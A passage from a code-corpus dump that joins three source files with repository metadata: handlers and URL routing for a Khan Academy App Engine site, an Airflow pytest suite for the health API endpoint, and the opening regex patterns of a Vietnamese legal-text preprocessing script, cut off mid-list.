playlist_title, so we can display\n # the playlist and the video in it that has the readable_id. Note that we don't\n # query the Video entities for one with the requested readable_id because in some\n # cases there are multiple Video objects in the datastore with the same readable_id\n # (e.g. there are 2 \"Order of Operations\" videos).\n\n videos = VideoPlaylist.get_cached_videos_for_playlist(playlist)\n previous_video = None\n next_video = None\n for v in videos:\n if v.readable_id == readable_id:\n v.selected = 'selected'\n video = v\n elif video is None:\n previous_video = v\n elif next_video is None:\n next_video = v\n\n if video is None:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n if App.offline_mode:\n video_path = \"/videos/\" + get_mangled_playlist_name(playlist_title) + \"/\" + video.readable_id + \".flv\"\n else:\n video_path = video.download_video_url()\n\n if video.description == video.title:\n video.description = None\n\n related_exercises = video.related_exercises()\n button_top_exercise = None\n if related_exercises:\n def ex_to_dict(exercise):\n return {\n 'name': exercise.display_name,\n 'url': exercise.relative_url,\n }\n button_top_exercise = ex_to_dict(related_exercises[0])\n\n user_video = UserVideo.get_for_video_and_user_data(video, UserData.current(), insert_if_missing=True)\n\n awarded_points = 0\n if user_video:\n awarded_points = user_video.points\n\n template_values = {\n 'playlist': playlist,\n 'video': video,\n 'videos': videos,\n 'video_path': video_path,\n 'video_points_base': consts.VIDEO_POINTS_BASE,\n 'button_top_exercise': button_top_exercise,\n 'related_exercises': [], # disabled for now\n 'previous_video': previous_video,\n 'next_video': next_video,\n 'selected_nav_link': 'watch',\n 'awarded_points': awarded_points,\n 'issue_labels': ('Component-Videos,Video-%s' % readable_id),\n 'author_profile': 'https://plus.google.com/103970106103092409324'\n }\n template_values = qa.add_template_values(template_values, self.request)\n\n bingo(['struggling_videos_landing',\n 'homepage_restructure_videos_landing'])\n self.render_jinja2_template('viewvideo.html', template_values)\n\nclass ReportIssue(request_handler.RequestHandler):\n\n def get(self):\n issue_type = self.request.get('type')\n self.write_response(issue_type, {'issue_labels': self.request.get('issue_labels'),})\n\n def write_response(self, issue_type, extra_template_values):\n user_agent = self.request.headers.get('User-Agent')\n if user_agent is None:\n user_agent = ''\n user_agent = user_agent.replace(',',';') # Commas delimit labels, so we don't want them\n template_values = {\n 'referer': self.request.headers.get('Referer'),\n 'user_agent': user_agent,\n }\n template_values.update(extra_template_values)\n page = 'reportissue_template.html'\n if issue_type == 'Defect':\n page = 'reportproblem.html'\n elif issue_type == 'Enhancement':\n page = 'makesuggestion.html'\n elif issue_type == 'New-Video':\n page = 'requestvideo.html'\n elif issue_type == 'Comment':\n page = 'makecomment.html'\n elif issue_type == 'Question':\n page = 'askquestion.html'\n\n self.render_jinja2_template(page, template_values)\n\nclass Crash(request_handler.RequestHandler):\n def get(self):\n if self.request_bool(\"capability_disabled\", default=False):\n raise CapabilityDisabledError(\"Simulate scheduled GAE downtime\")\n else:\n # Even Watson isn't perfect\n raise Exception(\"What is Toronto?\")\n\nclass ReadOnlyDowntime(request_handler.RequestHandler):\n def get(self):\n raise 
CapabilityDisabledError(\"App Engine maintenance period\")\n\n def post(self):\n return self.get()\n\nclass SendToLog(request_handler.RequestHandler):\n def post(self):\n message = self.request_string(\"message\", default=\"\")\n if message:\n logging.critical(\"Manually sent to log: %s\" % message)\n\nclass MobileFullSite(request_handler.RequestHandler):\n def get(self):\n self.set_mobile_full_site_cookie(True)\n self.redirect(\"/\")\n\nclass MobileSite(request_handler.RequestHandler):\n def get(self):\n self.set_mobile_full_site_cookie(False)\n self.redirect(\"/\")\n\nclass ViewFAQ(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/about/faq\", True)\n return\n\nclass ViewGetInvolved(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/contribute\", True)\n\nclass ViewContribute(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('contribute.html', {\"selected_nav_link\": \"contribute\"})\n\nclass ViewCredits(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('viewcredits.html', {\"selected_nav_link\": \"contribute\"})\n\nclass Donate(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/contribute\", True)\n\nclass ViewTOS(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('tos.html', {\"selected_nav_link\": \"tos\"})\n\nclass ViewAPITOS(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('api-tos.html', {\"selected_nav_link\": \"api-tos\"})\n\nclass ViewPrivacyPolicy(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('privacy-policy.html', {\"selected_nav_link\": \"privacy-policy\"})\n\nclass ViewDMCA(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('dmca.html', {\"selected_nav_link\": \"dmca\"})\n\nclass ViewSAT(request_handler.RequestHandler):\n\n def get(self):\n playlist_title = \"SAT Preparation\"\n query = Playlist.all()\n query.filter('title =', playlist_title)\n playlist = query.get()\n query = VideoPlaylist.all()\n query.filter('playlist =', playlist)\n query.filter('live_association = ', True) #need to change this to true once I'm done with all of my hacks\n query.order('video_position')\n playlist_videos = query.fetch(500)\n\n template_values = {\n 'videos': playlist_videos,\n }\n\n self.render_jinja2_template('sat.html', template_values)\n\nclass ViewGMAT(request_handler.RequestHandler):\n\n def get(self):\n problem_solving = VideoPlaylist.get_query_for_playlist_title(\"GMAT: Problem Solving\")\n data_sufficiency = VideoPlaylist.get_query_for_playlist_title(\"GMAT Data Sufficiency\")\n template_values = {\n 'data_sufficiency': data_sufficiency,\n 'problem_solving': problem_solving,\n }\n\n self.render_jinja2_template('gmat.html', template_values)\n\n\nclass RetargetFeedback(bulk_update.handler.UpdateKind):\n def get_keys_query(self, kind):\n \"\"\"Returns a keys-only query to get the keys of the entities to update\"\"\"\n return db.GqlQuery('select __key__ from Feedback')\n\n def use_transaction(self):\n return False\n\n def update(self, feedback):\n orig_video = feedback.video()\n\n if orig_video == None or type(orig_video).__name__ != \"Video\":\n return False\n readable_id = orig_video.readable_id\n query = Video.all()\n query.filter('readable_id =', readable_id)\n # The database currently contains multiple Video objects for a particular\n # video. Some are old. 
Some are due to a YouTube sync where the youtube urls\n # changed and our code was producing youtube_ids that ended with '_player'.\n # This hack gets the most recent valid Video object.\n key_id = 0\n for v in query:\n if v.key().id() > key_id and not v.youtube_id.endswith('_player'):\n video = v\n key_id = v.key().id()\n # End of hack\n if video is not None and video.key() != orig_video.key():\n logging.info(\"Retargeting Feedback %s from Video %s to Video %s\", feedback.key().id(), orig_video.key().id(), video.key().id())\n feedback.targets[0] = video.key()\n return True\n else:\n return False\n\nclass ChangeEmail(bulk_update.handler.UpdateKind):\n\n def get_email_params(self):\n old_email = self.request.get('old')\n new_email = self.request.get('new')\n prop = self.request.get('prop')\n if old_email is None or len(old_email) == 0:\n raise Exception(\"parameter 'old' is required\")\n if new_email is None or len(new_email) == 0:\n new_email = old_email\n if prop is None or len(prop) == 0:\n prop = \"user\"\n return (old_email, new_email, prop)\n\n def get(self):\n (old_email, new_email, prop) = self.get_email_params()\n if new_email == old_email:\n return bulk_update.handler.UpdateKind.get(self)\n self.response.out.write(\"To prevent a CSRF attack from changing email addresses, you initiate an email address change from the browser. \")\n self.response.out.write(\"Instead, run the following from remote_api_shell.py.

    \\n\")\n        self.response.out.write(\"import bulk_update.handler\\n\")\n        self.response.out.write(\"bulk_update.handler.start_task('%s',{'kind':'%s', 'old':'%s', 'new':'%s'})\\n\"\n                                % (self.request.path, self.request.get('kind'), old_email, new_email))\n        self.response.out.write(\"
    and then check the logs in the admin console\")\n\n\n def get_keys_query(self, kind):\n \"\"\"Returns a keys-only query to get the keys of the entities to update\"\"\"\n\n (old_email, new_email, prop) = self.get_email_params()\n # When a user's personal Google account is replaced by their transitioned Google Apps account with the same email,\n # the Google user ID changes and the new User object's are not considered equal to the old User object's with the same\n # email, so querying the datastore for entities referring to users with the same email return nothing. However an inequality\n # query will return the relevant entities.\n gt_user = users.User(old_email[:-1] + chr(ord(old_email[-1])-1) + chr(127))\n lt_user = users.User(old_email + chr(0))\n return db.GqlQuery(('select __key__ from %s where %s > :1 and %s < :2' % (kind, prop, prop)), gt_user, lt_user)\n\n def use_transaction(self):\n return False\n\n def update(self, entity):\n (old_email, new_email, prop) = self.get_email_params()\n if getattr(entity, prop).email() != old_email:\n # This should never occur, but just in case, don't change or reput the entity.\n return False\n setattr(entity, prop, users.User(new_email))\n return True\n\nclass Login(request_handler.RequestHandler):\n def get(self):\n return self.post()\n\n def post(self):\n cont = self.request_string('continue', default = \"/\")\n direct = self.request_bool('direct', default = False)\n\n openid_identifier = self.request.get('openid_identifier')\n if openid_identifier is not None and len(openid_identifier) > 0:\n if App.accepts_openid:\n self.redirect(users.create_login_url(cont, federated_identity = openid_identifier))\n return\n self.redirect(users.create_login_url(cont))\n return\n\n if App.facebook_app_secret is None:\n self.redirect(users.create_login_url(cont))\n return\n template_values = {\n 'continue': cont,\n 'direct': direct\n }\n self.render_jinja2_template('login.html', template_values)\n\nclass MobileOAuthLogin(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('login_mobile_oauth.html', {\n \"oauth_map_id\": self.request_string(\"oauth_map_id\", default=\"\"),\n \"anointed\": self.request_bool(\"an\", default=False),\n \"view\": self.request_string(\"view\", default=\"\")\n })\n\nclass PostLogin(request_handler.RequestHandler):\n def get(self):\n cont = self.request_string('continue', default = \"/\")\n\n # Immediately after login we make sure this user has a UserData entity\n user_data = UserData.current()\n if user_data:\n\n # Update email address if it has changed\n current_google_user = users.get_current_user()\n if current_google_user and current_google_user.email() != user_data.email:\n user_data.user_email = current_google_user.email()\n user_data.put()\n\n # Update nickname if it has changed\n current_nickname = get_nickname_for(user_data)\n if user_data.user_nickname != current_nickname:\n user_data.user_nickname = current_nickname\n user_data.put()\n\n # Set developer and moderator to True if user is admin\n if (not user_data.developer or not user_data.moderator) and users.is_current_user_admin():\n user_data.developer = True\n user_data.moderator = True\n user_data.put()\n\n # If user is brand new and has 0 points, migrate data\n phantom_id = get_phantom_user_id_from_cookies()\n if phantom_id:\n phantom_data = UserData.get_from_db_key_email(phantom_id)\n\n # First make sure user has 0 points and phantom user has some activity\n if user_data.points == 0 and phantom_data and phantom_data.points > 0:\n\n # Make 
sure user has no students\n if not user_data.has_students():\n\n # Clear all \"login\" notifications\n UserNotifier.clear_all(phantom_data)\n\n # Update phantom user_data to real user_data\n phantom_data.user_id = user_data.user_id\n phantom_data.current_user = user_data.current_user\n phantom_data.user_email = user_data.user_email\n phantom_data.user_nickname = user_data.user_nickname\n\n if phantom_data.put():\n # Phantom user was just transitioned to real user\n user_counter.add(1)\n user_data.delete()\n\n cont = \"/newaccount?continue=%s\" % cont\n else:\n\n # If nobody is logged in, clear any expired Facebook cookie that may be hanging around.\n self.delete_cookie(\"fbsr_\" + App.facebook_app_id)\n self.delete_cookie(\"fbs_\" + App.facebook_app_id)\n\n logging.critical(\"Missing UserData during PostLogin, with id: %s, cookies: (%s), google user: %s\" % (\n util.get_current_user_id(), os.environ.get('HTTP_COOKIE', ''), users.get_current_user()\n )\n )\n\n # Always delete phantom user cookies on login\n self.delete_cookie('ureg_id')\n\n self.redirect(cont)\n\nclass Logout(request_handler.RequestHandler):\n def get(self):\n self.delete_cookie('ureg_id')\n self.redirect(users.create_logout_url(self.request_string(\"continue\", default=\"/\")))\n\nclass Search(request_handler.RequestHandler):\n\n def get(self):\n query = self.request.get('page_search_query')\n template_values = {'page_search_query': query}\n query = query.strip()\n if len(query) < search.SEARCH_PHRASE_MIN_LENGTH:\n if len(query) > 0:\n template_values.update({\n 'query_too_short': search.SEARCH_PHRASE_MIN_LENGTH\n })\n self.render_jinja2_template(\"searchresults.html\", template_values)\n return\n searched_phrases = []\n\n # Do an async query for all ExerciseVideos, since this may be slow\n exvids_query = ExerciseVideo.all()\n exvids_future = util.async_queries([exvids_query])\n\n # One full (non-partial) search, then sort by kind\n all_text_keys = Playlist.full_text_search(\n query, limit=50, kind=None,\n stemming=Playlist.INDEX_STEMMING,\n multi_word_literal=Playlist.INDEX_MULTI_WORD,\n searched_phrases_out=searched_phrases)\n\n\n # Quick title-only partial search\n playlist_partial_results = filter(\n lambda playlist_dict: query in playlist_dict[\"title\"].lower(),\n autocomplete.playlist_title_dicts())\n video_partial_results = filter(\n lambda video_dict: query in video_dict[\"title\"].lower(),\n autocomplete.video_title_dicts())\n\n # Combine results & do one big get!\n all_key_list = [str(key_and_title[0]) for key_and_title in all_text_keys]\n #all_key_list.extend([result[\"key\"] for result in playlist_partial_results])\n all_key_list.extend([result[\"key\"] for result in video_partial_results])\n all_key_list = list(set(all_key_list))\n all_entities = db.get(all_key_list)\n\n # Filter results by type\n playlists = []\n videos = []\n for entity in all_entities:\n if isinstance(entity, Playlist):\n playlists.append(entity)\n elif isinstance(entity, Video):\n videos.append(entity)\n elif entity is not None:\n logging.error(\"Unhandled kind in search results: \" +\n str(type(entity)))\n\n playlist_count = len(playlists)\n\n # Get playlists for videos not in matching playlists\n filtered_videos = []\n filtered_videos_by_key = {}\n for video in videos:\n if [(playlist.title in video.playlists) for playlist in playlists].count(True) == 0:\n video_playlist = video.first_playlist()\n if video_playlist != None:\n playlists.append(video_playlist)\n filtered_videos.append(video)\n filtered_videos_by_key[str(video.key())] = 
[]\n else:\n filtered_videos.append(video)\n filtered_videos_by_key[str(video.key())] = []\n video_count = len(filtered_videos)\n\n # Get the related exercises\n all_exercise_videos = exvids_future[0].get_result()\n exercise_keys = []\n for exvid in all_exercise_videos:\n video_key = str(ExerciseVideo.video.get_value_for_datastore(exvid))\n if video_key in filtered_videos_by_key:\n exercise_key = ExerciseVideo.exercise.get_value_for_datastore(exvid)\n video_exercise_keys = filtered_videos_by_key[video_key]\n video_exercise_keys.append(exercise_key)\n exercise_keys.append(exercise_key)\n exercises = db.get(exercise_keys)\n\n # Sort exercises with videos\n video_exercises = {}\n for video_key, exercise_keys in filtered_videos_by_key.iteritems():\n video_exercises[video_key] = map(lambda exkey: [exercise for exercise in exercises if exercise.key() == exkey][0], exercise_keys)\n\n # Count number of videos in each playlist and sort descending\n for playlist in playlists:\n if len(filtered_videos) > 0:\n playlist.match_count = [(playlist.title in video.playlists) for video in filtered_videos].count(True)\n else:\n playlist.match_count = 0\n playlists = sorted(playlists, key=lambda playlist: -playlist.match_count)\n\n template_values.update({\n 'playlists': playlists,\n 'videos': filtered_videos,\n 'video_exercises': video_exercises,\n 'search_string': query,\n 'video_count': video_count,\n 'playlist_count': playlist_count,\n })\n self.render_jinja2_template(\"searchresults.html\", template_values)\n\nclass RedirectToJobvite(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"http://hire.jobvite.com/CompanyJobs/Careers.aspx?k=JobListing&c=qd69Vfw7\")\n\nclass RedirectToToolkit(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"https://sites.google.com/a/khanacademy.org/schools/\")\n\nclass PermanentRedirectToHome(request_handler.RequestHandler):\n def get(self):\n\n redirect_target = \"/\"\n relative_path = self.request.path.rpartition('/')[2].lower()\n\n # Permanently redirect old JSP version of the site to home\n # or, in the case of some special targets, to their appropriate new URL\n dict_redirects = {\n \"sat.jsp\": \"/sat\",\n \"gmat.jsp\": \"/gmat\",\n }\n\n if dict_redirects.has_key(relative_path):\n redirect_target = dict_redirects[relative_path]\n\n self.redirect(redirect_target, True)\n\nclass ServeUserVideoCss(request_handler.RequestHandler):\n def get(self):\n user_data = UserData.current()\n if user_data == None:\n return\n\n user_video_css = models.UserVideoCss.get_for_user_data(user_data)\n self.response.headers['Content-Type'] = 'text/css'\n\n if user_video_css.version == user_data.uservideocss_version:\n # Don't cache if there's a version mismatch and update isn't finished\n self.response.headers['Cache-Control'] = 'public,max-age=1000000'\n\n self.response.out.write(user_video_css.video_css)\n\nclass RealtimeEntityCount(request_handler.RequestHandler):\n def get(self):\n if not App.is_dev_server:\n raise Exception(\"Only works on dev servers.\")\n default_kinds = 'Exercise'\n kinds = self.request_string(\"kinds\", default_kinds).split(',')\n for kind in kinds:\n count = getattr(models, kind).all().count(10000)\n self.response.out.write(\"%s: %d
    \" % (kind, count))\n\napplicationSmartHistory = webapp2.WSGIApplication([\n ('/.*', smarthistory.SmartHistoryProxy)\n])\n\napplication = webapp2.WSGIApplication([\n ('/', homepage.ViewHomePage),\n ('/about', util_about.ViewAbout),\n ('/about/blog', blog.ViewBlog),\n ('/about/blog/.*', blog.ViewBlogPost),\n ('/about/the-team', util_about.ViewAboutTheTeam),\n ('/about/getting-started', util_about.ViewGettingStarted),\n ('/about/tos', ViewTOS ),\n ('/about/api-tos', ViewAPITOS),\n ('/about/privacy-policy', ViewPrivacyPolicy ),\n ('/about/dmca', ViewDMCA ),\n ('/contribute', ViewContribute ),\n ('/contribute/credits', ViewCredits ),\n ('/frequently-asked-questions', util_about.ViewFAQ),\n ('/about/faq', util_about.ViewFAQ),\n ('/downloads', util_about.ViewDownloads),\n ('/about/downloads', util_about.ViewDownloads),\n ('/getinvolved', ViewGetInvolved),\n ('/donate', Donate),\n ('/exercisedashboard', exercises.ViewAllExercises),\n\n # Issues a command to re-generate the library content.\n ('/library_content', library.GenerateLibraryContent),\n\n ('/exercise/(.+)', exercises.ViewExercise), # /exercises/addition_1\n ('/exercises', exercises.ViewExercise), # This old /exercises?exid=addition_1 URL pattern is deprecated\n ('/review', exercises.ViewExercise),\n\n ('/khan-exercises/exercises/.*', exercises.RawExercise),\n ('/viewexercisesonmap', exercises.ViewAllExercises),\n ('/editexercise', exercises.EditExercise),\n ('/updateexercise', exercises.UpdateExercise),\n ('/moveexercisemapnodes', exercises.MoveMapNodes),\n ('/admin94040', exercises.ExerciseAdmin),\n ('/video/(.*)', ViewVideo),\n ('/v/(.*)', ViewVideo),\n ('/video', ViewVideo), # Backwards URL compatibility\n ('/sat', ViewSAT),\n ('/gmat', ViewGMAT),\n ('/reportissue', ReportIssue),\n ('/search', Search),\n ('/savemapcoords', knowledgemap.SaveMapCoords),\n ('/saveexpandedallexercises', knowledgemap.SaveExpandedAllExercises),\n ('/crash', Crash),\n\n ('/image_cache/(.+)', ImageCache),\n\n ('/mobilefullsite', MobileFullSite),\n ('/mobilesite', MobileSite),\n\n ('/admin/reput', bulk_update.handler.UpdateKind),\n ('/admin/retargetfeedback', RetargetFeedback),\n ('/admin/startnewbadgemapreduce', util_badges.StartNewBadgeMapReduce),\n ('/admin/badgestatistics', util_badges.BadgeStatistics),\n ('/admin/startnewexercisestatisticsmapreduce', exercise_statistics.StartNewExerciseStatisticsMapReduce),\n ('/admin/startnewvotemapreduce', voting.StartNewVoteMapReduce),\n ('/admin/feedbackflagupdate', qa.StartNewFlagUpdateMapReduce),\n ('/admin/dailyactivitylog', activity_summary.StartNewDailyActivityLogMapReduce),\n ('/admin/youtubesync.*', youtube_sync.YouTubeSync),\n ('/admin/changeemail', ChangeEmail),\n ('/admin/realtimeentitycount', RealtimeEntityCount),\n\n ('/devadmin/emailchange', devpanel.Email),\n ('/devadmin/managedevs', devpanel.Manage),\n ('/devadmin/managecoworkers', devpanel.ManageCoworkers),\n ('/devadmin/commoncore', devpanel.CommonCore),\n\n ('/coaches', coaches.ViewCoaches),\n ('/students', coaches.ViewStudents),\n ('/registercoach', coaches.RegisterCoach),\n ('/unregistercoach', coaches.UnregisterCoach),\n ('/unregisterstudent', coaches.UnregisterStudent),\n ('/requeststudent', coaches.RequestStudent),\n ('/acceptcoach', coaches.AcceptCoach),\n\n ('/createstudentlist', coaches.CreateStudentList),\n ('/deletestudentlist', coaches.DeleteStudentList),\n ('/removestudentfromlist', coaches.RemoveStudentFromList),\n ('/addstudenttolist', coaches.AddStudentToList),\n\n ('/individualreport', coaches.ViewIndividualReport),\n 
('/progresschart', coaches.ViewProgressChart),\n ('/sharedpoints', coaches.ViewSharedPoints),\n ('/classreport', coaches.ViewClassReport),\n ('/classtime', coaches.ViewClassTime),\n ('/charts', coaches.ViewCharts),\n\n ('/mailing-lists/subscribe', util_mailing_lists.Subscribe),\n\n ('/profile/graph/activity', util_profile.ActivityGraph),\n ('/profile/graph/focus', util_profile.FocusGraph),\n ('/profile/graph/exercisesovertime', util_profile.ExercisesOverTimeGraph),\n ('/profile/graph/exerciseproblems', util_profile.ExerciseProblemsGraph),\n ('/profile/graph/exerciseprogress', util_profile.ExerciseProgressGraph),\n ('/profile', util_profile.ViewProfile),\n\n ('/profile/graph/classexercisesovertime', util_profile.ClassExercisesOverTimeGraph),\n ('/profile/graph/classenergypointsperminute', util_profile.ClassEnergyPointsPerMinuteGraph),\n ('/profile/graph/classtime', util_profile.ClassTimeGraph),\n ('/class_profile', util_profile.ViewClassProfile),\n\n ('/login', Login),\n ('/login/mobileoauth', MobileOAuthLogin),\n ('/postlogin', PostLogin),\n ('/logout', Logout),\n\n ('/api-apps/register', oauth_apps.Register),\n\n # These are dangerous, should be able to clean things manually from the remote python shell\n\n ('/deletevideoplaylists', DeleteVideoPlaylists),\n ('/killliveassociations', KillLiveAssociations),\n\n # Below are all discussion related pages\n ('/discussion/addcomment', comments.AddComment),\n ('/discussion/pagecomments', comments.PageComments),\n\n ('/discussion/addquestion', qa.AddQuestion),\n ('/discussion/expandquestion', qa.ExpandQuestion),\n ('/discussion/addanswer', qa.AddAnswer),\n ('/discussion/editentity', qa.EditEntity),\n ('/discussion/answers', qa.Answers),\n ('/discussion/pagequestions', qa.PageQuestions),\n ('/discussion/clearflags', qa.ClearFlags),\n ('/discussion/flagentity', qa.FlagEntity),\n ('/discussion/voteentity', voting.VoteEntity),\n ('/discussion/updateqasort', voting.UpdateQASort),\n ('/admin/discussion/finishvoteentity', voting.FinishVoteEntity),\n ('/discussion/deleteentity', qa.DeleteEntity),\n ('/discussion/changeentitytype', qa.ChangeEntityType),\n ('/discussion/videofeedbacknotificationlist', notification.VideoFeedbackNotificationList),\n ('/discussion/videofeedbacknotificationfeed', notification.VideoFeedbackNotificationFeed),\n ('/discussion/moderatorlist', qa.ModeratorList),\n ('/discussion/flaggedfeedback', qa.FlaggedFeedback),\n\n ('/githubpost', github.NewPost),\n ('/githubcomment', github.NewComment),\n\n ('/toolkit', RedirectToToolkit),\n\n ('/paypal/ipn', paypal.IPN),\n\n ('/badges/view', util_badges.ViewBadges),\n ('/badges/custom/create', custom_badges.CreateCustomBadge),\n ('/badges/custom/award', custom_badges.AwardCustomBadge),\n\n ('/notifierclose', util_notify.ToggleNotify),\n ('/newaccount', Clone),\n\n ('/jobs', RedirectToJobvite),\n ('/jobs/.*', RedirectToJobvite),\n\n ('/dashboard', dashboard.Dashboard),\n ('/contentdash', dashboard.ContentDashboard),\n ('/admin/dashboard/record_statistics', dashboard.RecordStatistics),\n ('/admin/entitycounts', dashboard.EntityCounts),\n\n ('/sendtolog', SendToLog),\n\n ('/user_video_css', ServeUserVideoCss),\n\n ('/admin/exercisestats/collectfancyexercisestatistics', exercisestats.CollectFancyExerciseStatistics),\n ('/exercisestats/report', exercisestats.report.Test),\n ('/exercisestats/exerciseovertime', exercisestats.report_json.ExerciseOverTimeGraph),\n ('/exercisestats/geckoboardexerciseredirect', exercisestats.report_json.GeckoboardExerciseRedirect),\n ('/exercisestats/exercisestatsmap', 
exercisestats.report_json.ExerciseStatsMapGraph),\n ('/exercisestats/exerciseslastauthorcounter', exercisestats.report_json.ExercisesLastAuthorCounter),\n ('/exercisestats/exercisenumbertrivia', exercisestats.report_json.ExerciseNumberTrivia),\n ('/exercisestats/userlocationsmap', exercisestats.report_json.UserLocationsMap),\n ('/exercisestats/exercisescreatedhistogram', exercisestats.report_json.ExercisesCreatedHistogram),\n\n ('/goals/new', goals.handlers.CreateNewGoal),\n ('/goals/admincreaterandom', goals.handlers.CreateRandomGoalData),\n\n ('/robots.txt', robots.RobotsTxt),\n\n ('/r/.*', redirects.Redirect),\n ('/redirects', redirects.List),\n ('/redirects/add', redirects.Add),\n ('/redirects/remove', redirects.Remove),\n\n # Redirect any links to old JSP version\n ('/.*\\.jsp', PermanentRedirectToHome),\n ('/index\\contribute', PermanentRedirectToHome),\n\n ('/_ah/warmup.*', warmup.Warmup),\n\n # -- KHAN-NL -----------------------------------\n ('/nl-content/.*', nl.Content),\n ('/nl_report', nl_report.BugReporter),\n\t('/helpmee', nl.LinkerHelpmee),\n\n ], debug=True)\n\napplication = profiler.ProfilerWSGIMiddleware(application)\napplication = GAEBingoWSGIMiddleware(application)\napplication = request_cache.RequestCacheMiddleware(application)\n\ndef main():\n if os.environ[\"SERVER_NAME\"] == \"smarthistory.khanacademy.org\":\n run_wsgi_app(applicationSmartHistory)\n else:\n run_wsgi_app(application)\n\nif __name__ == '__main__':\n main()\n","repo_name":"KhanWorld/KhanAcademy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":37707,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"32682330613","text":"from __future__ import annotations\n\nfrom datetime import timedelta\nfrom unittest import mock\n\nimport pytest\n\nfrom airflow.jobs.job import Job\nfrom airflow.jobs.scheduler_job_runner import SchedulerJobRunner\nfrom airflow.utils import timezone\nfrom airflow.utils.session import create_session, provide_session\nfrom airflow.utils.state import State\n\nHEALTHY = \"healthy\"\nUNHEALTHY = \"unhealthy\"\n\n\nclass TestHealthTestBase:\n @pytest.fixture(autouse=True)\n def setup_attrs(self, minimal_app_for_api) -> None:\n self.app = minimal_app_for_api\n self.client = self.app.test_client() # type:ignore\n with create_session() as session:\n session.query(Job).delete()\n\n def teardown_method(self):\n with create_session() as session:\n session.query(Job).delete()\n\n\nclass TestGetHealth(TestHealthTestBase):\n @provide_session\n def test_healthy_scheduler_status(self, session):\n last_scheduler_heartbeat_for_testing_1 = timezone.utcnow()\n job = Job(state=State.RUNNING, latest_heartbeat=last_scheduler_heartbeat_for_testing_1)\n SchedulerJobRunner(job=job)\n session.add(job)\n session.commit()\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"healthy\" == resp_json[\"scheduler\"][\"status\"]\n assert (\n last_scheduler_heartbeat_for_testing_1.isoformat()\n == resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"]\n )\n\n @provide_session\n def test_unhealthy_scheduler_is_slow(self, session):\n last_scheduler_heartbeat_for_testing_2 = timezone.utcnow() - timedelta(minutes=1)\n job = Job(state=State.RUNNING, latest_heartbeat=last_scheduler_heartbeat_for_testing_2)\n SchedulerJobRunner(job=job)\n session.add(job)\n session.commit()\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == 
resp_json[\"metadatabase\"][\"status\"]\n assert \"unhealthy\" == resp_json[\"scheduler\"][\"status\"]\n assert (\n last_scheduler_heartbeat_for_testing_2.isoformat()\n == resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"]\n )\n\n def test_unhealthy_scheduler_no_job(self):\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"unhealthy\" == resp_json[\"scheduler\"][\"status\"]\n assert resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"] is None\n\n @mock.patch.object(SchedulerJobRunner, \"most_recent_job\")\n def test_unhealthy_metadatabase_status(self, most_recent_job_mock):\n most_recent_job_mock.side_effect = Exception\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"unhealthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"] is None\n","repo_name":"a0x8o/airflow","sub_path":"tests/api_connexion/endpoints/test_health_endpoint.py","file_name":"test_health_endpoint.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"73030843939","text":"import re\nimport math\nimport json\nimport pandas as pd\nimport string \n\n# common phrases in legal documents\nre_thuchientheo = re.compile(\n r\"((((được\\s)?thực hiện theo qu[iy] định tại\\s|hướng dẫn tại\\s|theo qu[iy] định tại\\s|(được\\s)?thực hiện theo\\s|theo qu[iy] định tại\\s|theo nội dung qu[yi] định tại\\s|quy[iy] định tại|theo\\s)(các\\s)?)?|tại\\s(các\\s)?)(khoản(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điều(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điểm\\s(([a-z]|đ)\\,\\s)*([a-z]|đ)\\b|chương(\\ssố)?\\s(\\d+\\,\\s)*\\d+)((\\s|\\,\\s|\\s\\,\\s|\\svà\\s)(khoản(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điều(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điểm\\s(([a-z]|đ)\\,\\s)*([a-z]|đ)\\b|chương(\\ssố)?\\s(\\d+\\,\\s)*\\d+))*(\\s(điều này|thông tư này|nghị quyết này|quyết định này|nghị định này|văn bản này|quyết định này))?\"\n)\nre_thongtuso = re.compile(\n r\"(thông tư liên tịch|thông tư|nghị quyết|quyết định|nghị định|văn bản|Thông tư liên tịch|Thông tư|Nghị quyết|Nghị định|Văn bản|Quyết định)\\s(số\\s)?(([a-z0-9]|đ|\\-)+\\/([a-z0-9]|đ|\\-|\\/)*)\"\n)\nre_ngay = re.compile(r\"ngày\\s\\d+\\/\\d+\\/\\d+\\b|ngày\\s\\d+tháng\\d+năm\\d+\")\nre_thang_nam = re.compile(r\"tháng\\s\\d+\\/\\d+|tháng\\s\\d+|năm\\s\\d+\")\nre_chuong = re.compile(\n r\"chương\\s(III|II|IV|IX|VIII|VII|VI|XIII|XII|XI|XIV|XIX|XVIII|XVII|XVI|XV|XX|V|X|I|XXIII|XXII|XXI|XXIV|XXVIII|XXVII|XXVI|XXV|XXIX|XXX)\\b\"\n)\n\n# common end phrases in questions\nEND_PHRASES = [\n \"có đúng không\",\n \"đúng không\",\n \"được không\",\n \"hay không\",\n \"được 